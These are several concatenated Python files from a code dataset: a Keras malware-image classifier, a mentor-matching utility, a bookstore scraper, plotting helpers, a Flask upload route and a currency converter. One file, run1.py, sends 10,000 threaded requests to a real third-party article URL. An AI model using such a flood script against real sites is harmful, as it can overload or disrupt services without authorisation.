Flatten, Dense\nfrom keras import backend as K\nimport os\nfrom shutil import copyfile\nimport shutil\n\nbenign_list = []\nmalicious_list = []\n# def get_path_list(root_dir):\n#     path_list = []\n#     for subdir, dirs, files in os.walk(root_dir):\n#         for file in files:\n#             path_list.append(os.path.join(subdir, file))\n#     #return path_list\n\n# dimensions of our images\nimg_width, img_height = 256, 1024\ndataset = '/home/worker1/Ly/PackDeep/dataset/images/'\ntrain_val = '/home/worker1/Ly/PackDeep/'\n\n# # benign_samples = get_path_list(dataset + 'benign')\n# for subdir, dirs, files in os.walk(dataset + 'benign'):\n#     for file in files:\n#         benign_list.append(os.path.join(subdir, file))\n# print(len(benign_list))\n\n\n# benign_train = benign_list[:len(benign_list)/2]\n\n# for bt in benign_train:\n#     copyfile(bt, train_val + 'train/benign/'+ os.path.basename(bt))\n\n# benign_val = benign_list[len(benign_list)/2:]\n\n\n# for subdir, dirs, files in os.walk(dataset + 'malicious'):\n#     for file in files:\n#         malicious_list.append(os.path.join(subdir, file))\n# print(len(malicious_list))\n\n# malicious_train = malicious_list[:len(malicious_list)/2]\n# malicious_val = malicious_list[len(malicious_list)/2:]\n\n\nN = 1000\n\n\ndef move_malicious(abs_dirname, ratio):\n    \"\"\"Move files into subdirectories.\"\"\"\n    train_malicious = 'train/malicious/'\n    shutil.rmtree(train_malicious)\n    os.makedirs(train_malicious)\n    val_malicious = 'validation/malicious/'\n    shutil.rmtree(val_malicious)\n    os.makedirs(val_malicious)\n    files = [os.path.join(abs_dirname, f) for f in os.listdir(abs_dirname)]\n    for f in files[0:ratio]:\n        # create new subdir if necessary\n        #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n        #os.mkdir('train/' + file_type)\n        #curr_subdir = subdir_name\n\n        # move file to current dir\n        f_base = os.path.basename(f)\n\n        copyfile(f, train_malicious + f_base)\n\n    for f in files[ratio:]:\n        # create new subdir if necessary\n        #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n        #os.mkdir('validation/' + file_type )\n        f_base = os.path.basename(f)\n\n        copyfile(f, val_malicious + f_base)\n        #copyfile(f, 'validation/malicious/' + f_base)\n\n\ndef move_benign(abs_dirname, ratio):\n    \"\"\"Move files into subdirectories.\"\"\"\n\n    train_benign = 'train/benign/'\n    shutil.rmtree(train_benign)\n    os.makedirs(train_benign)\n    val_benign = 'validation/benign/'\n    shutil.rmtree(val_benign)\n    os.makedirs(val_benign)\n    files = [os.path.join(abs_dirname, f) for f in os.listdir(abs_dirname)]\n    for f in files[0:ratio]:\n        # create new subdir if necessary\n        #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n        #os.mkdir('train/' + file_type)\n        #curr_subdir = subdir_name\n\n        # move file to current dir\n        f_base = os.path.basename(f)\n\n        copyfile(f, train_benign + f_base)\n        #copyfile(f, 'train/benign/' + f_base)\n\n    for f in files[ratio:]:\n        # create new subdir if necessary\n        #subdir_name = os.path.join(abs_dirname, '{0:03d}'.format(i / N + 1))\n        #os.mkdir('validation/' + file_type )\n        f_base = os.path.basename(f)\n\n        copyfile(f, val_benign + f_base)\n        #copyfile(f, 'validation/benign/' + f_base)\n\nmove_malicious('malicious', 2000)\nmove_benign('benign', 2000)\n# Divide dataset\n\ntrain_data_dir = '/home/worker1/Ly/PackDeep/train'\nvalidation_data_dir = '/home/worker1/Ly/PackDeep/validation'\n# train_data_dir = '/home/lyvd/GitHub/PackDeep/images/train'\n# validation_data_dir = 'images/validation'\nnb_train_samples = 4000\nnb_validation_samples = 2000\nepochs = 100\n
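# Note (illustrative comment): flow_from_directory below infers the two binary\n# classes from the subdirectory names, i.e. train/benign and train/malicious\n# (and likewise under validation/), as populated by move_benign/move_malicious above.\n# Caveat: train_datagen rescales pixels by 1/255 while test_datagen does not;\n# matching the rescaling of the two generators is usually desirable.\n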
batch_size = 16\n\nif K.image_data_format() == 'channels_first':\n    input_shape = (3, img_width, img_height)\nelse:\n    input_shape = (img_width, img_height, 3)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(32, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Conv2D(64, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\nmodel.add(Flatten())\n\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n              optimizer='rmsprop', metrics=['accuracy'])\n\n# This is the augmentation configuration we will use for training\ntrain_datagen = ImageDataGenerator(\n    rescale=1. / 255,\n    shear_range=0.2,\n    zoom_range=0.2,\n    horizontal_flip=True,\n)\n\n# # This is the augmentation configuration we will use for testing\n# # only rescaling\n# test_datagen = ImageDataGenerator(rescale = 1. /255)\ntest_datagen = ImageDataGenerator()\n\ntrain_generator = train_datagen.flow_from_directory(\n    'train/',\n    target_size=(img_width, img_height),\n    batch_size=batch_size,\n    class_mode='binary'\n)\n\nvalidation_generator = test_datagen.flow_from_directory(\n    'validation',\n    target_size=(img_width, img_height),\n    batch_size=batch_size,\n    class_mode='binary'\n)\n\nmodel.fit_generator(\n    train_generator,\n    steps_per_epoch=nb_train_samples // batch_size,\n    epochs=epochs,\n    validation_data=validation_generator,\n    validation_steps=nb_validation_samples // batch_size\n)\n\n# model.save_weights('first_try.h5')\n# This is a PIL image\n# img = load_img('/home/lyvd/GitHub/PackDeep/DC/train_set/cats/cat.0.jpg')\n# x = img_to_array(img) # This is a Numpy array with shape (3, 150,
 150)\n# print(x.shape)\n# x= x.reshape((1,) + x.shape) # this is a Numpy array with shape (1, 3,\n# 150, 150)\n\n# # The .flow() command below generates batches of randomly transformed images\n# # and saves the results to the `preview` directory\n# i = 0\n# for batch in datagen.flow(x, batch_size = 1, save_to_dir='preview', save_prefix='arp', save_format = 'jpeg'):\n#     i += 1\n#     if i > 20:\n#         break\n","sub_path":"imageGenerator.py","file_name":"imageGenerator.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"427081380","text":"import pandas as pd\nimport numpy as np\nfrom matching.constants import *\n\n\"\"\"\nSplit df by major group.\n\nParameters\n--------------------\n    data -- pandas df, mentor/mentee data\n\nReturns\n--------------------\n    majorMap -- dict, major_group_no->corresponding_df\n\"\"\"\n\ndef splitByMajor(data):\n    majorMap = dict()\n    for i in range(1, num_major_categories+1):\n        majorMap[i] = data.loc[data[categoryChoices['MajorsQuestion']]==i].reset_index(drop=True)\n    return majorMap\n\n\"\"\"\nProcess mentor data to get relevant contact details\n\nParameters\n--------------------\n    filename -- string, path to mentor csv\n\nReturns\n--------------------\n    mentor_contact -- dict, ucla email -> (name,preferred email,phone)\n\"\"\"\ndef get_mentor_contact(filename):\n    mentor_data = pd.read_csv(filename)\n    contact_columns = [\"Username\", \"Full Legal Name (First and Last)\", \"Preferred Email (We will use this email for all future communication)\", \"Phone Number (##########)\"]\n    mentor_data = mentor_data[contact_columns]\n\n    mentor_contact = dict()\n\n    for i in range(len(mentor_data)):\n        mentor = mentor_data.iloc[i]\n        if np.isnan(mentor[3]):\n            contact_info = (mentor[1], mentor[2], \"\")\n        else:\n            contact_info = (mentor[1], mentor[2], int(mentor[3]))\n        mentor_contact[mentor[0]] = contact_info\n\n    return mentor_contact\n\n\"\"\"\nProcess mentee data to get relevant contact details\n\nParameters\n--------------------\n    filename -- string, path to mentee csv\n\nReturns\n--------------------\n    mentee_contact -- dict, email -> (name)\n\"\"\"\ndef get_mentee_contact(filename):\n    mentee_data = pd.read_csv(filename)\n    contact_columns = [\"Name\", \"Email\"]\n    mentee_data = mentee_data[contact_columns]\n\n    mentee_contact = dict()\n\n    for i in range(len(mentee_data)):\n        mentee = mentee_data.iloc[i]\n        contact_info = (mentee[0])\n        mentee_contact[mentee[1]] = contact_info\n\n    return mentee_contact\n\n\nif __name__ == '__main__':\n    mentor_contact = get_mentor_contact(\"MentorSEAS Mentor Form.csv\")\n    print(mentor_contact)\n    mentee_contact = get_mentee_contact(\"New-Transfers.csv\")\n    print(mentee_contact)\n","sub_path":"matching/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"458100455","text":"# -*- coding=utf-8 -*-\nimport datetime\nfrom threading import Thread\nimport urllib.request\n\nurlStr = 'https://www.toutiao.com/i6537157013078540814/' # target URL\nthreadCount = 100 # number of threads\nthreadColumn = 100 # number of requests per thread\n\nclass MyThread(Thread):\n    def __init__(self, name):\n        Thread.__init__(self)\n        self.name = name\n\n    def run(self):\n        for i in range(0, threadColumn):\n            res = urllib.request.urlopen(urlStr)\n            print('subThread', self.name, 'opened request', str(i), 'at:', datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'))\n\nprint('mainThread Start:', datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f'))\nfor i in 
range(0,threadCount):\n threadTmp = MyThread(str(i))\n threadTmp.start()","sub_path":"run1.py","file_name":"run1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"71429265","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nimport csv\nimport re\n\n\ndriver = webdriver.Chrome()\n# Go to the computer books page \ndriver.get(\"https://www.barnesandnoble.com/b/textbooks/computers/artificial-intelligence-ai/_/N-8q9Zuv9\")\n\n\n# Find the total number of pages \nt = driver.find_element_by_xpath('//div[@class=\"text--middle\"]').text\nprint(t)\none, per_page, total = map(lambda x: int(x), re.findall('\\d+', t))\nnumber_pages = total // per_page\nprint(one, per_page, total)\nnum_urls = ['https://www.barnesandnoble.com/b/textbooks/computers/artificial-intelligence-ai/_/N-8q9Zuv9?Nrpp=20&page={}'.format(x) for x in range(1,number_pages+1)]\nprint(len(num_urls))\n\ncsv_file = open('ratingsAI.csv', 'w', encoding='utf-8')\nwriter = csv.writer(csv_file)\n\nfor url in num_urls[:50]:\n\tprint(url)\n\trating_dict = {}\n\tdriver.get(url)\n\tdetail_links = driver.find_elements_by_xpath('//div[@class=\"product-shelf-title product-info-title pt-xs\"]/a')\n\tratings_loop = driver.find_elements_by_xpath('//div[@class=\"product-shelf-ratings\"]')\n\tprice_loop = driver.find_elements_by_xpath('//div[@class=\"product-shelf-pricing\"]/div/a/span[2]')\n\tbook_urls = []\n\tratings_list = []\n\tprice_list = []\n\n\tfor link in detail_links:\n\t\tvalue = (link.get_attribute(\"href\"))\n\t\tbook_urls.append(value)\n\t\t\n\n\tfor loop in ratings_loop:\n\t\trating = (loop.get_attribute(\"aria-label\"))\n\t\tratings_list.append(rating)\t\n\t\n\n\tfor loop in price_loop:\n\t\tprice = loop.text #(loop.find_element_by_tag_name('span'))\n\t\tprice_list.append(price)\t\n\n\tfor i in range(len(book_urls)):\n\t\tisbn = re.search('(\\d+$)', book_urls[i] ).group(1)\n\t\tISBN13 = int(isbn)\n\t\trating_dict[\"ISBN13\"] = ISBN13\n\n\t\tratings = re.search('(\\d+\\.\\d+)', ratings_list[i])\n\t\trating_dict[\"RATINGS\"] = ratings.group(1)\n\t\tprices = re.search('(\\d+\\.\\d+)', price_list[i])\n\t\trating_dict[\"PRICE\"] = float(prices.group(1))\n\n\t\twriter.writerow(rating_dict.values())\n\t\n\ncsv_file.close()\ndriver.close()\n\n\n\n","sub_path":"barnes_AI_starter.py","file_name":"barnes_AI_starter.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"210867484","text":"import numpy as np\nimport networkx as nx\nfrom itertools import product\n\n\n# Global variables\nDEPOT, SUPPLY, DELIVERY = \"Depot\", \"S\", \"D\"\nBLUE, GREEN, RED, BLACK = \"blue\", \"green\", \"red\", \"black\"\n\n\ndef get_label(instance, i: int):\n \"\"\"\n Returns the label of a specified index of a model\n :param instance: instance object\n :param i:\n :return:\n \"\"\"\n if i == 0:\n return DEPOT\n if 0 < i <= instance.model_input.num_scooters:\n return SUPPLY\n else:\n return DELIVERY\n\n\ndef create_node_dict(instance):\n output = {}\n locations = (\n [instance.depot]\n + list(zip(instance.scooters[\"lat\"], instance.scooters[\"lon\"]))\n + list(zip(instance.delivery_nodes[\"lat\"], instance.delivery_nodes[\"lon\"]))\n )\n for i, index in enumerate(locations):\n output[index] = {\"label\": 
get_label(instance, i)}\n return output\n\n\ndef make_graph(nodes: dict, bound):\n \"\"\"\n Creates a networkx graph of the input nodes. Adds label to the nodes\n :param nodes: dictionary of nodes [lat, lon]: \"label\"\n :return: networkx graph, list of node labels, list of nodes border color, list of nodes color\n \"\"\"\n # Converts geographical coordinates to cartesian with lim [0,1] for visualization reasons\n nodes = convert_geographic_to_cart(nodes, bound)\n\n # make graph object\n graph = nx.DiGraph()\n graph.add_nodes_from([i for i in range(len(nodes.keys()))])\n\n # set node label and position in graph\n labels = {}\n node_color = []\n node_border = []\n for i, p in enumerate(nodes.keys()):\n label = nodes[p][\"label\"]\n if label == DEPOT:\n labels[i] = DELIVERY\n node_color.append(BLUE)\n node_border.append(BLACK)\n elif label == SUPPLY:\n labels[i] = i\n node_color.append(GREEN)\n node_border.append(BLACK)\n elif label == DELIVERY:\n labels[i] = i\n node_color.append(RED)\n node_border.append(BLACK)\n\n graph.nodes[i][\"pos\"] = p\n\n return graph, labels, node_border, node_color\n\n\ndef add_vehicle_node_info(instance, ax):\n \"\"\"\n Function to add information about vehicles for the first plot\n :param instance: Instance object for a given solution\n :param ax: Subplot to plot the information\n :return: Colors corresponding to vehicles used to color edges\n \"\"\"\n # generate random colors for vehicle routs\n np.random.seed(10)\n colors = [\n \"#%06X\" % np.random.randint(0, 0xFFFFFF)\n for i in range(instance.model_input.num_service_vehicles)\n ]\n\n (\n num_of_service_vehicles,\n service_vehicles_scooter_cap,\n service_vehicles_battery_cap,\n ) = instance.service_vehicles\n\n # adding vehicle color description\n for i in range(len(colors)):\n s = f\"Vehicle {(i + 1)}\"\n ax.text(\n 0,\n 1 - 0.03 * i,\n s,\n transform=ax.transAxes,\n c=colors[i],\n fontsize=10,\n weight=\"bold\",\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n )\n\n # vehicle info box\n cons = (\n f\"Vehicle constraint:\\nTime = %d h %d m \\n\\nCar capacity:\\nBattery = %d \\nScooters = %d\"\n % (\n int(instance.model.get_parameters().shift_duration / 60),\n instance.model.get_parameters().shift_duration % 60,\n service_vehicles_battery_cap,\n service_vehicles_scooter_cap,\n )\n )\n\n props = dict(boxstyle=\"round\", facecolor=\"wheat\", pad=0.5, alpha=0.5)\n\n # place a text box in upper left in axes coords\n ax.text(\n 0,\n 1 - 0.03 * (len(colors) + 1),\n cons,\n transform=ax.transAxes,\n fontsize=10,\n horizontalalignment=\"left\",\n verticalalignment=\"top\",\n bbox=props,\n )\n\n return colors\n\n\ndef display_edge_plot(instance, ax, s_edge_labels={}):\n \"\"\"\n Function to display second plot of edges not included in solution\n :param instance: Instance object for a given solution\n :param s_edge_labels: Dictionary of edges used in solution, default empty for infeasible solutions\n :param ax: Subplot\n \"\"\"\n\n ax.axis(\"off\")\n # draw nodes\n node_dict = create_node_dict(instance)\n graph, labels, node_border, node_color = make_graph(node_dict, instance.bound)\n\n edge_labels = {}\n\n # check to handle infeasible models\n if instance.is_feasible():\n # draw edges and set label (time cost and inventory)\n for x in instance.model.x:\n from_node, to_node, vehicle_id = x\n if instance.model.x[x].x == 0:\n if (\n from_node != to_node\n and not s_edge_labels.keys().__contains__((from_node, to_node))\n and not s_edge_labels.keys().__contains__((to_node, from_node))\n ):\n 
 graph.add_edge(from_node, to_node, color=\"grey\", width=1, alpha=0.2)\n                        edge_labels[(from_node, to_node)] = \"t = \" + str(\n                            round(\n                                instance.model.get_parameters().time_cost[\n                                    (from_node, to_node)\n                                ],\n                                2,\n                            )\n                        )\n    else:\n        for x in instance.model.x:\n            from_node, to_node, vehicle_id = x\n            if (\n                vehicle_id == 0\n                and instance.model.get_parameters().time_cost[(from_node, to_node)] > 0\n            ):\n                graph.add_edge(from_node, to_node, color=\"grey\", width=1, alpha=0.2)\n                edge_labels[(from_node, to_node)] = \"t = \" + str(\n                    round(\n                        instance.model.get_parameters().time_cost[(from_node, to_node)],\n                        2,\n                    )\n                )\n\n    edges = graph.edges()\n    e_colors = [graph[u][v][\"color\"] for u, v in edges]\n    e_weights = [graph[u][v][\"width\"] for u, v in edges]\n\n    pos = nx.get_node_attributes(graph, \"pos\")\n\n    # draw graph\n    edges = nx.draw_networkx_edges(\n        graph, pos, edge_color=e_colors, width=e_weights, node_size=1, ax=ax,\n    )\n    nx.draw_networkx_labels(graph, pos, labels, font_size=1, font_color=\"w\", ax=ax)\n    nx.draw_networkx_edge_labels(graph, pos, edge_labels=edge_labels, ax=ax)\n\n    for e in edges:\n        e.set_linestyle(\"dashed\")\n\n\ndef convert_geographic_to_cart(nodes, bound):\n    \"\"\"\n    Function to convert geographical coordinates to cartesian\n    :param nodes: Dictionary of nodes [lat,lon]: type\n    :return: Dictionary of nodes [cart_x, cart_y]: type\n    \"\"\"\n    lat_min, lat_max, lon_min, lon_max = bound\n    delta_lat = lat_max - lat_min\n    delta_lon = lon_max - lon_min\n    zero_lat = lat_min / delta_lat\n    zero_lon = lon_min / delta_lon\n\n    output = {}\n\n    for i, j in nodes.keys():\n        key = ((j / delta_lon - zero_lon), (i / delta_lat - zero_lat))\n        output[key] = nodes[(i, j)]\n\n    return output\n\n\ndef add_zones(number_of_zones, ax):\n    \"\"\"\n    Function to add zones to solution plot\n    :param number_of_zones: int - number of zones per axis\n    :param ax: subplot\n    \"\"\"\n    axis_interval = float(1 / number_of_zones)\n    xy = list(\n        product(\n            np.arange(axis_interval, 1, axis_interval),\n            np.arange(axis_interval, 1, axis_interval),\n        )\n    )\n    for x, y in xy:\n        ax.axhline(x, xmax=0.93, color=\"black\")\n        ax.axvline(y, ymax=0.98, color=\"black\")\n","sub_path":"project_thesis/visualization/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":7518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"12859741","text":"from flask import Flask, request\napp = Flask(__name__)\n\n\n@app.route('/upload', methods=['GET', 'POST'])\ndef upload_file():\n    if request.method == 'POST':\n        f = request.files['the_file']\n        f.save('/var/www/uploads/upload_file.txt')\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"quickstart/AccessingRequsetData/FileUpload.py","file_name":"FileUpload.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"457223994","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import with_statement, print_function, division\n\nimport sys\nimport os.path as op\nfrom functools import wraps\nimport datetime\nfrom datetime import timedelta\nfrom collections import defaultdict, namedtuple\n\n# We could have used \"six\", but this way we have no extra dependency\nif sys.version_info[0] < 3:\n    range = xrange\n    from itertools import izip as zip, izip_longest as zip_longest\n\n    def iteritems(d):\n        return d.iteritems()\n\n    def itervalues(d):\n        return d.itervalues()\nelse:\n    from itertools import zip_longest\n\n    def 
iteritems(d):\n return d.items()\n\n def itervalues(d):\n return d.values()\n\n\n_DIRNAME = op.realpath(op.dirname(__file__))\nCURRENCY_FILE = op.join(_DIRNAME, 'eurofxref-hist.csv')\n\nBounds = namedtuple('Bounds', 'first_date last_date')\n\n__all__ = ['CurrencyConverter',\n 'S3CurrencyConverter',\n 'RateNotFoundError', ]\n\n\ndef memoize(function):\n memo = {}\n\n @wraps(function)\n def wrapper(*args):\n if args not in memo:\n memo[args] = function(*args)\n return memo[args]\n return wrapper\n\n\n@memoize\ndef list_dates_between(first_date, last_date):\n \"\"\"Returns all dates from first to last included.\"\"\"\n return [first_date + timedelta(days=n)\n for n in range(1 + (last_date - first_date).days)]\n\n\n@memoize\ndef parse_date(s):\n \"\"\"Fast %Y-%m-%d parsing.\"\"\"\n return datetime.date(int(s[:4]), int(s[5:7]), int(s[8:10]))\n\n\nclass RateNotFoundError(Exception):\n \"\"\"Custom exception when data is missing in the rates file.\"\"\"\n pass\n\n\nclass CurrencyConverter(object):\n \"\"\"\n At init, load the historic currencies (since 1999) from the ECB.\n The rates are EUR foreign exchange reference rates:\n\n Date,USD,JPY,BGN,CYP,CZK,...\n 2014-03-28,1.3759,140.9,1.9558,N/A,27.423,...\n 2014-03-27,1.3758,...\n\n ``_rates`` is a dictionary with:\n + currencies as keys\n + {date: rate, ...} as values.\n\n ``currencies`` is a set of all available currencies.\n ``bounds`` is a dict if first and last date available per currency.\n \"\"\"\n def __init__(self,\n currency_file=CURRENCY_FILE,\n fallback_on_wrong_date=False,\n fallback_on_missing_rate=False,\n ref_currency='EUR',\n na_values=frozenset(['', 'N/A']),\n verbose=False):\n\n # Global options\n self.fallback_on_wrong_date = fallback_on_wrong_date\n self.fallback_on_missing_rate = fallback_on_missing_rate\n self.ref_currency = ref_currency # reference currency of rates\n self.na_values = na_values # missing values\n self.verbose = verbose\n\n # Will be filled once the file is loaded\n self._rates = None\n self.bounds = None\n self.currencies = None\n\n if currency_file is not None:\n self._load_file(currency_file)\n\n def _load_file(self, currency_file):\n \"\"\"To be subclassed if alternate methods of loading data.\"\"\"\n with open(currency_file) as lines:\n self._load_lines(lines)\n\n def _load_lines(self, lines):\n _rates = self._rates = defaultdict(dict)\n na_values = self.na_values\n\n header = next(lines).strip().split(',')[1:]\n\n for line in lines:\n line = line.strip().split(',')\n date = parse_date(line[0])\n for currency, rate in zip(header, line[1:]):\n if rate not in na_values and currency: # skip empty currency\n _rates[currency][date] = float(rate)\n\n self.currencies = set(self._rates) | set([self.ref_currency])\n self._compute_bounds()\n\n for currency in sorted(self._rates):\n self._set_missing_to_none(currency)\n if self.fallback_on_missing_rate:\n self._compute_missing_rates(currency)\n\n def _compute_bounds(self):\n self.bounds = dict((currency, Bounds(min(r), max(r)))\n for currency, r in iteritems(self._rates))\n\n self.bounds[self.ref_currency] = Bounds(\n min(b.first_date for b in itervalues(self.bounds)),\n max(b.last_date for b in itervalues(self.bounds)))\n\n def _set_missing_to_none(self, currency):\n \"\"\"Fill missing rates of a currency with the closest available ones.\"\"\"\n rates = self._rates[currency]\n first_date, last_date = self.bounds[currency]\n\n for date in list_dates_between(first_date, last_date):\n if date not in rates:\n rates[date] = None\n\n if self.verbose:\n missing = len([r 
for r in itervalues(rates) if r is None])\n if missing:\n print('{0}: {1} missing rates from {2} to {3} ({4} days)'.format(\n currency, missing, first_date, last_date,\n 1 + (last_date - first_date).days))\n\n def _compute_missing_rates(self, currency):\n \"\"\"Fill missing rates of a currency with the closest available ones.\"\"\"\n rates = self._rates[currency]\n\n # tmp will store the closest rates forward and backward\n tmp = defaultdict(lambda: [None, None])\n\n for date in sorted(rates):\n rate = rates[date]\n if rate is not None:\n closest_rate = rate\n dist = 0\n else:\n dist += 1\n tmp[date][0] = closest_rate, dist\n\n for date in sorted(rates, reverse=True):\n rate = rates[date]\n if rate is not None:\n closest_rate = rate\n dist = 0\n else:\n dist += 1\n tmp[date][1] = closest_rate, dist\n\n for date in sorted(tmp):\n (r0, d0), (r1, d1) = tmp[date]\n rates[date] = (r0 * d1 + r1 * d0) / (d0 + d1)\n if self.verbose:\n print(('{0}: filling {1} missing rate using {2} ({3}d old) and '\n '{4} ({5}d later)').format(currency, date, r0, d0, r1, d1))\n\n def _get_rate(self, currency, date):\n \"\"\"Get a rate for a given currency and date.\n\n :type date: datetime.date\n\n >>> from datetime import date\n >>> c = CurrencyConverter()\n >>> c._get_rate('USD', date=date(2014, 3, 28))\n 1.375...\n >>> c._get_rate('BGN', date=date(2010, 11, 21))\n Traceback (most recent call last):\n RateNotFoundError: BGN has no rate for 2010-11-21\n \"\"\"\n if currency == self.ref_currency:\n return 1.0\n\n if date not in self._rates[currency]:\n first_date, last_date = self.bounds[currency]\n\n if not self.fallback_on_wrong_date:\n raise RateNotFoundError('{0} not in {1} bounds {2}/{3}'.format(\n date, currency, first_date, last_date))\n\n if date < first_date:\n fallback_date = first_date\n elif date > last_date:\n fallback_date = last_date\n else:\n raise AssertionError('Should never happen, bug in the code!')\n\n if self.verbose:\n print(r'/!\\ {0} not in {1} bounds {2}/{3}, falling back to {4}'.format(\n date, currency, first_date, last_date, fallback_date))\n\n date = fallback_date\n\n rate = self._rates[currency][date]\n if rate is None:\n raise RateNotFoundError('{0} has no rate for {1}'.format(currency, date))\n return rate\n\n def convert(self, amount, currency, new_currency='EUR', date=None):\n \"\"\"Convert amount from a currency to another one.\n\n :type date: datetime.date\n\n >>> from datetime import date\n >>> c = CurrencyConverter()\n >>> c.convert(100, 'EUR', 'USD', date=date(2014, 3, 28))\n 137.5...\n >>> c.convert(100, 'USD', date=date(2014, 3, 28))\n 72.67...\n >>> c.convert(100, 'BGN', date=date(2010, 11, 21))\n Traceback (most recent call last):\n RateNotFoundError: BGN has no rate for 2010-11-21\n \"\"\"\n # ref_currency is in self.currencies\n if currency not in self.currencies:\n raise ValueError('{0} is not a supported currency'.format(currency))\n\n if date is None:\n date = self.bounds[currency].last_date\n else:\n try:\n date = date.date() # fallback if input was a datetime object\n except AttributeError:\n pass\n\n r0 = self._get_rate(currency, date)\n r1 = self._get_rate(new_currency, date)\n\n return float(amount) / r0 * r1\n\n\nclass S3CurrencyConverter(CurrencyConverter):\n \"\"\"\n Load the ECB CSV file from an S3 key instead of from a local file.\n The first argument should be an instance of boto.s3.key.Key (or any other\n object that provides a get_contents_as_string() method which returns the\n CSV file as a string).\n \"\"\"\n def __init__(self, currency_file, 
**kwargs):\n \"\"\"Make currency_file a required attribute\"\"\"\n super(S3CurrencyConverter, self).__init__(currency_file, **kwargs)\n\n def _load_file(self, currency_file):\n lines = currency_file.get_contents_as_string().splitlines()\n self._load_lines(lines)\n\n\ndef grouper(iterable, n, fillvalue=None):\n \"\"\"Group iterable by n elements.\n\n >>> grouper('abcdefg', 3, fillvalue='x')\n [('a', 'b', 'c'), ('d', 'e', 'f'), ('g', 'x', 'x')]\n \"\"\"\n return list(zip_longest(*[iter(iterable)] * n, fillvalue=fillvalue))\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('amount', type=float)\n parser.add_argument('currency')\n\n parser.add_argument(\n '-t', '--to',\n help='target currency, default is %(default)s',\n default='EUR')\n\n parser.add_argument(\n '-d', '--date',\n help='date of rate, with format %%Y-%%m-%%d',\n default=None)\n\n parser.add_argument(\n '-v', '--verbose',\n help=('display available currencies, use twice (-vv) to '\n 'also display details of missing rates completion'),\n action='count',\n default=0)\n\n parser.add_argument(\n '-f', '--file',\n help='change currency file used, default is %(default)s',\n default=CURRENCY_FILE)\n\n args = parser.parse_args()\n\n c = CurrencyConverter(currency_file=args.file,\n fallback_on_wrong_date=True,\n fallback_on_missing_rate=True,\n verbose=args.verbose > 1)\n currencies = sorted(c.currencies)\n\n if args.verbose:\n print('{0} available currencies:'.format(len(currencies)))\n for group in grouper(currencies, 10, fillvalue=''):\n print(' '.join(group))\n print()\n\n currencies.sort(key=lambda u: c.bounds[u].last_date, reverse=True)\n currencies.sort(key=lambda u: c.bounds[u].first_date)\n for currency in currencies:\n first_date, last_date = c.bounds[currency]\n print('{0}: from {1} to {2} ({3} days)'.format(\n currency, first_date, last_date,\n 1 + (last_date - first_date).days))\n print()\n\n if args.currency not in c.currencies:\n print(r'/!\\ \"{0}\" is not in available currencies:'.format(args.currency))\n for group in grouper(currencies, 10, fillvalue=''):\n print(' '.join(group))\n exit(1)\n\n if args.date is not None:\n date = parse_date(args.date)\n else:\n date = c.bounds[args.currency].last_date\n\n new_amount = c.convert(amount=args.amount,\n currency=args.currency,\n new_currency=args.to,\n date=date)\n\n print('{0:.3f} {1} = {2:.3f} {3} on {4}'.format(\n args.amount,\n args.currency,\n new_amount,\n args.to,\n date))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"currency_converter/currency_converter.py","file_name":"currency_converter.py","file_ext":"py","file_size_in_byte":11941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
